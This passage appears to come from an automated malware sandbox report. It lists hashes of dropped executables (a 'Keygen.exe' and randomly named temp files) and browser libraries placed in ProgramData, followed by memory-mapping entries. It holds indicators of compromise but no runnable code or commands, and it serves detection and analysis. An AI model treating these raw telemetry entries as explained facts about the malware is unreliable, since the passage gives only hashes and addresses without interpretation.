        fb35b4347d5949468cc179381ce0d1deea7509824aec7ec9e1fa246df79df0744215952628eea860e008b8c2d08e590446a31364dd3537f6c6f4dc8a9794d961

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        b604fb1d60b326888a213e1e5dce6aa0

        SHA1

        b5c3ffd0ac24e9c4e62afc1556c11f08ec2fe8a6

        SHA256

        d9fd6bbb4b5ae6b138c133dd63e3dbcd9713f26dc63cb6b14b1383004e71d5ea

        SHA512

        fb35b4347d5949468cc179381ce0d1deea7509824aec7ec9e1fa246df79df0744215952628eea860e008b8c2d08e590446a31364dd3537f6c6f4dc8a9794d961

      • C:\Users\Public\dpk.exe
        MD5

        92821d6dd83105f5f2d08c43f28fa309

        SHA1

        93c72e2494705509b56ca93cea2448aff098cb6d

        SHA256

        dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

        SHA512

        47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

      • C:\Users\Public\dpk.exe
        MD5

        92821d6dd83105f5f2d08c43f28fa309

        SHA1

        93c72e2494705509b56ca93cea2448aff098cb6d

        SHA256

        dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

        SHA512

        47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

      • C:\Users\Public\dpk.exe
        MD5

        92821d6dd83105f5f2d08c43f28fa309

        SHA1

        93c72e2494705509b56ca93cea2448aff098cb6d

        SHA256

        dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

        SHA512

        47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

      • C:\Users\Public\pat.exe
        MD5

        92821d6dd83105f5f2d08c43f28fa309

        SHA1

        93c72e2494705509b56ca93cea2448aff098cb6d

        SHA256

        dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

        SHA512

        47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

      • C:\Users\Public\pat.exe
      • C:\Users\Public\pat.exe
      • C:\Users\Public\pfd.exe
        MD5

        1f76254f98b1ce3e145e72de250b6b01

        SHA1

        2f7170a01be8b4638b9b869758d7b34a49306c14

        SHA256

        e9909c77bc763fd20edbfbd3b4ad1306399d365312ea50eb45079a4f54afc0e2

        SHA512

        f4e1640018e7cc8994ac917a3208a1c3b7152c373182c9fe62cc7a7b73ecc81c470039530122c52e8b1f3386de0c3165d61be3188f409d72ce86511421b2b289

      • C:\Users\Public\pfd.exe
        MD5

        1f76254f98b1ce3e145e72de250b6b01

        SHA1

        2f7170a01be8b4638b9b869758d7b34a49306c14

        SHA256

        e9909c77bc763fd20edbfbd3b4ad1306399d365312ea50eb45079a4f54afc0e2

        SHA512

        f4e1640018e7cc8994ac917a3208a1c3b7152c373182c9fe62cc7a7b73ecc81c470039530122c52e8b1f3386de0c3165d61be3188f409d72ce86511421b2b289

      • C:\Users\Public\pfd.exe
      • \??\PIPE\srvsvc
      • \ProgramData\mozglue.dll
      • \ProgramData\mozglue.dll
      • \ProgramData\msvcp140.dll
      • \ProgramData\msvcp140.dll
      • \ProgramData\nss3.dll
        MD5

        bfac4e3c5908856ba17d41edcd455a51

        SHA1

        8eec7e888767aa9e4cca8ff246eb2aacb9170428

        SHA256

        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

        SHA512

        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

      • \ProgramData\nss3.dll
        MD5

        bfac4e3c5908856ba17d41edcd455a51

        SHA1

        8eec7e888767aa9e4cca8ff246eb2aacb9170428

        SHA256

        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

        SHA512

        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

      • \ProgramData\sqlite3.dll
      • \ProgramData\sqlite3.dll
      • \ProgramData\vcruntime140.dll
      • \ProgramData\vcruntime140.dll
      • \Users\Admin\AppData\Local\Temp\4A78.tmp\Keygen.exe
        MD5

        ea2c982c12fbec5f145948b658da1691

        SHA1

        d17baf0b8f782934da0c686f2e87f019643be458

        SHA256

        eecd6f108f35df83d4450effa5d5640efe7e5f2fff819833f01fb2d053e626d4

        SHA512

        1f1d6768467fff8387be1cf536e01cfbf28cb04777fa184f18fcab0c518ead8d52827abe5ca1c566c425616c7b06ab1bce0c92dd684c818b51fc52fa0f4b74b8

      • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
        MD5

        385e5b97d97b89cacff3594eafeb0e5e

        SHA1

        70e73110860c36c83c504f4804e3cebde2a618a1

        SHA256

        7b02ca9b842110100cd0471c27498b46a2542507ffaee32086bdfa4fd9c736b3

        SHA512

        f83f175846b8b674e140fff442ba8958bceb63fba2cdc2ab6c2b1e047e6c0d22c3f0ce36c9fcf44c7f744099a44fe9f497494d4e2eb47579af133c1b3dc20d83

      • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
        MD5

        385e5b97d97b89cacff3594eafeb0e5e

        SHA1

        70e73110860c36c83c504f4804e3cebde2a618a1

        SHA256

        7b02ca9b842110100cd0471c27498b46a2542507ffaee32086bdfa4fd9c736b3

        SHA512

        f83f175846b8b674e140fff442ba8958bceb63fba2cdc2ab6c2b1e047e6c0d22c3f0ce36c9fcf44c7f744099a44fe9f497494d4e2eb47579af133c1b3dc20d83

      • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
        MD5

        385e5b97d97b89cacff3594eafeb0e5e

        SHA1

        70e73110860c36c83c504f4804e3cebde2a618a1

        SHA256

        7b02ca9b842110100cd0471c27498b46a2542507ffaee32086bdfa4fd9c736b3

        SHA512

        f83f175846b8b674e140fff442ba8958bceb63fba2cdc2ab6c2b1e047e6c0d22c3f0ce36c9fcf44c7f744099a44fe9f497494d4e2eb47579af133c1b3dc20d83

      • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
        MD5

        385e5b97d97b89cacff3594eafeb0e5e

        SHA1

        70e73110860c36c83c504f4804e3cebde2a618a1

        SHA256

        7b02ca9b842110100cd0471c27498b46a2542507ffaee32086bdfa4fd9c736b3

        SHA512

        f83f175846b8b674e140fff442ba8958bceb63fba2cdc2ab6c2b1e047e6c0d22c3f0ce36c9fcf44c7f744099a44fe9f497494d4e2eb47579af133c1b3dc20d83

      • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
      • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
        MD5

        35bccedd18360d94a33d86c09af8480c

        SHA1

        013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

        SHA256

        ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

        SHA512

        31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

      • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
        MD5

        35bccedd18360d94a33d86c09af8480c

        SHA1

        013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

        SHA256

        ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

        SHA512

        31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

      • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
        MD5

        35bccedd18360d94a33d86c09af8480c

        SHA1

        013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

        SHA256

        ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

        SHA512

        31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

      • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
        MD5

        35bccedd18360d94a33d86c09af8480c

        SHA1

        013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

        SHA256

        ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

        SHA512

        31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

      • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
      • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
      • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
      • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
      • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
      • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
      • \Users\Public\dpk.exe
        MD5

        92821d6dd83105f5f2d08c43f28fa309

        SHA1

        93c72e2494705509b56ca93cea2448aff098cb6d

        SHA256

        dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

        SHA512

        47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

      • \Users\Public\dpk.exe
        MD5

        92821d6dd83105f5f2d08c43f28fa309

        SHA1

        93c72e2494705509b56ca93cea2448aff098cb6d

        SHA256

        dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

        SHA512

        47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

      • \Users\Public\dpk.exe
      • \Users\Public\dpk.exe
      • \Users\Public\dpk.exe
      • \Users\Public\dpk.exe
      • \Users\Public\dpk.exe
      • \Users\Public\dpk.exe
      • \Users\Public\dpk.exe
      • \Users\Public\pat.exe
        MD5

        92821d6dd83105f5f2d08c43f28fa309

        SHA1

        93c72e2494705509b56ca93cea2448aff098cb6d

        SHA256

        dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

        SHA512

        47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

      • \Users\Public\pat.exe
        MD5

        92821d6dd83105f5f2d08c43f28fa309

        SHA1

        93c72e2494705509b56ca93cea2448aff098cb6d

        SHA256

        dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

        SHA512

        47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

      • \Users\Public\pfd.exe
        MD5

        1f76254f98b1ce3e145e72de250b6b01

        SHA1

        2f7170a01be8b4638b9b869758d7b34a49306c14

        SHA256

        e9909c77bc763fd20edbfbd3b4ad1306399d365312ea50eb45079a4f54afc0e2

        SHA512

        f4e1640018e7cc8994ac917a3208a1c3b7152c373182c9fe62cc7a7b73ecc81c470039530122c52e8b1f3386de0c3165d61be3188f409d72ce86511421b2b289

      • memory/268-19-0x0000000000000000-mapping.dmp
      • memory/268-127-0x0000000006510000-0x0000000006511000-memory.dmp
        Filesize

        4KB

      • memory/268-27-0x00000000714B0000-0x0000000071B9E000-memory.dmp
        Filesize

        6.9MB

      • memory/832-306-0x0000000000400000-0x0000000000420000-memory.dmp
        Filesize

        128KB

      • memory/832-307-0x000000000041A684-mapping.dmp
      • memory/832-309-0x0000000000400000-0x0000000000420000-memory.dmp
        Filesize

        128KB

      • memory/1012-20-0x0000000000000000-mapping.dmp
      • memory/1012-25-0x00000000714B0000-0x0000000071B9E000-memory.dmp
        Filesize

        6.9MB

      • memory/1012-196-0x0000000006730000-0x0000000006731000-memory.dmp
        Filesize

        4KB

      • memory/1012-195-0x0000000006710000-0x0000000006711000-memory.dmp
        Filesize

        4KB

      • memory/1012-172-0x0000000006530000-0x0000000006531000-memory.dmp
        Filesize

        4KB

      • memory/1012-178-0x00000000065D0000-0x00000000065D1000-memory.dmp
        Filesize

        4KB

      • memory/1104-233-0x0000000000400000-0x0000000000493000-memory.dmp
        Filesize

        588KB

      • memory/1104-236-0x0000000000400000-0x0000000000493000-memory.dmp
        Filesize

        588KB

      • memory/1104-234-0x000000000043FCC3-mapping.dmp
      • memory/1112-18-0x0000000000000000-mapping.dmp
      • memory/1308-29-0x0000000000000000-mapping.dmp
      • memory/1316-298-0x0000000000000000-mapping.dmp
      • memory/1360-0-0x0000000000000000-mapping.dmp
      • memory/1472-31-0x0000000000000000-mapping.dmp
      • memory/1572-8-0x0000000000000000-mapping.dmp
      • memory/1600-10-0x0000000000000000-mapping.dmp
      • memory/1636-11-0x0000000000000000-mapping.dmp
      • memory/1644-244-0x00000000011F0000-0x00000000011F1000-memory.dmp
        Filesize

        4KB

      • memory/1644-246-0x0000000000200000-0x0000000000201000-memory.dmp
        Filesize

        4KB

      • memory/1644-254-0x0000000000630000-0x0000000000681000-memory.dmp
        Filesize

        324KB

      • memory/1644-243-0x0000000073680000-0x0000000073D6E000-memory.dmp
        Filesize

        6.9MB

      • memory/1644-240-0x0000000000000000-mapping.dmp
      • memory/1760-5-0x0000000000000000-mapping.dmp
      • memory/1760-4-0x0000000000000000-mapping.dmp
      • memory/1844-301-0x0000000000000000-mapping.dmp
      • memory/1872-17-0x0000000000000000-mapping.dmp
      • memory/1904-14-0x0000000000000000-mapping.dmp
      • memory/1964-24-0x00000000714B0000-0x0000000071B9E000-memory.dmp
        Filesize

        6.9MB

      • memory/1964-38-0x00000000047D0000-0x00000000047D1000-memory.dmp
        Filesize

        4KB

      • memory/1964-13-0x0000000000000000-mapping.dmp
      • memory/1964-56-0x0000000005440000-0x0000000005441000-memory.dmp
        Filesize

        4KB

      • memory/1972-45-0x00000000714B0000-0x0000000071B9E000-memory.dmp
        Filesize

        6.9MB

      • memory/1972-50-0x00000000027C0000-0x00000000027C1000-memory.dmp
        Filesize

        4KB

      • memory/1972-37-0x0000000000000000-mapping.dmp
      • memory/1980-15-0x0000000000000000-mapping.dmp
      • memory/1980-32-0x00000000022E0000-0x00000000022E1000-memory.dmp
        Filesize

        4KB

      • memory/1980-223-0x0000000006400000-0x0000000006401000-memory.dmp
        Filesize

        4KB

      • memory/1980-26-0x00000000714B0000-0x0000000071B9E000-memory.dmp
        Filesize

        6.9MB

      • memory/2000-64-0x0000000005860000-0x0000000005861000-memory.dmp
        Filesize

        4KB

      • memory/2000-82-0x00000000064E0000-0x00000000064E1000-memory.dmp
        Filesize

        4KB

      • memory/2000-70-0x0000000006330000-0x0000000006331000-memory.dmp
        Filesize

        4KB

      • memory/2000-77-0x0000000005810000-0x0000000005811000-memory.dmp
        Filesize

        4KB

      • memory/2000-43-0x00000000714B0000-0x0000000071B9E000-memory.dmp
        Filesize

        6.9MB

      • memory/2000-36-0x0000000000000000-mapping.dmp
      • memory/2000-69-0x00000000058B0000-0x00000000058B1000-memory.dmp
        Filesize

        4KB

      • memory/2316-252-0x0000000000000000-mapping.dmp
      • memory/2352-104-0x0000000000000000-mapping.dmp
      • memory/2400-110-0x0000000000000000-mapping.dmp
      • memory/2424-231-0x0000000000000000-mapping.dmp
      • memory/2424-241-0x0000000002890000-0x0000000002894000-memory.dmp
        Filesize

        16KB

      • memory/2424-114-0x0000000000000000-mapping.dmp
      • memory/2444-187-0x000007FEF80C0000-0x000007FEF833A000-memory.dmp
        Filesize

        2.5MB

      • memory/2472-293-0x000000000043FCC3-mapping.dmp
      • memory/2472-297-0x000000000043FCC3-mapping.dmp
      • memory/2472-292-0x000000000043FCC3-mapping.dmp
      • memory/2472-290-0x000000000043FCC3-mapping.dmp
      • memory/2472-299-0x000000000043FCC3-mapping.dmp
      • memory/2472-123-0x0000000000400000-0x0000000000498000-memory.dmp
        Filesize

        608KB

      • memory/2472-120-0x0000000000400000-0x0000000000498000-memory.dmp
        Filesize

        608KB

      • memory/2472-291-0x000000000043FCC3-mapping.dmp
      • memory/2472-296-0x000000000043FCC3-mapping.dmp
      • memory/2472-295-0x000000000043FCC3-mapping.dmp
      • memory/2472-121-0x000000000043FCC3-mapping.dmp
      • memory/2508-130-0x0000000000400000-0x0000000000425000-memory.dmp
        Filesize

        148KB

      • memory/2508-128-0x000000000041A684-mapping.dmp
      • memory/2508-126-0x0000000000400000-0x0000000000425000-memory.dmp
        Filesize

        148KB

      • memory/2548-230-0x00000000048A0000-0x0000000004950000-memory.dmp
        Filesize

        704KB

      • memory/2548-137-0x00000000008F0000-0x00000000008F1000-memory.dmp
        Filesize

        4KB

      • memory/2548-135-0x00000000714B0000-0x0000000071B9E000-memory.dmp
        Filesize

        6.9MB

      • memory/2548-232-0x0000000000B40000-0x0000000000B4D000-memory.dmp
        Filesize

        52KB

      • memory/2548-132-0x0000000000000000-mapping.dmp
      • memory/2648-141-0x0000000000000000-mapping.dmp
      • memory/2716-149-0x0000000000000000-mapping.dmp
      • memory/2736-255-0x0000000000000000-mapping.dmp
      • memory/2736-267-0x00000000028C0000-0x00000000028C4000-memory.dmp
        Filesize

        16KB

      • memory/2736-152-0x0000000000000000-mapping.dmp
      • memory/2752-253-0x0000000000000000-mapping.dmp
      • memory/2796-162-0x000000000043FCC3-mapping.dmp
      • memory/2828-175-0x0000000000400000-0x0000000000439000-memory.dmp
        Filesize

        228KB

      • memory/2828-168-0x0000000000400000-0x0000000000439000-memory.dmp
        Filesize

        228KB

      • memory/2828-169-0x0000000000417A8B-mapping.dmp
      • memory/2844-170-0x000000000041A684-mapping.dmp
      • memory/2876-274-0x0000000000000000-mapping.dmp
      • memory/2876-275-0x0000000001E70000-0x0000000001E81000-memory.dmp
        Filesize

        68KB

      • memory/2876-278-0x0000000001E70000-0x0000000001E81000-memory.dmp
        Filesize

        68KB

      • memory/2876-300-0x0000000002670000-0x0000000002681000-memory.dmp
        Filesize

        68KB

      • memory/2884-258-0x0000000000400000-0x0000000000434000-memory.dmp
        Filesize

        208KB

      • memory/2884-259-0x0000000000417A8B-mapping.dmp
      • memory/2884-261-0x0000000000400000-0x0000000000434000-memory.dmp
        Filesize

        208KB

      • memory/2976-269-0x0000000000890000-0x0000000000891000-memory.dmp
        Filesize

        4KB

      • memory/2976-265-0x0000000000000000-mapping.dmp
      • memory/2976-302-0x0000000000380000-0x00000000003A4000-memory.dmp
        Filesize

        144KB

      • memory/2976-268-0x00000000735F0000-0x0000000073CDE000-memory.dmp
        Filesize

        6.9MB

      • memory/2976-271-0x0000000000370000-0x0000000000371000-memory.dmp
        Filesize

        4KB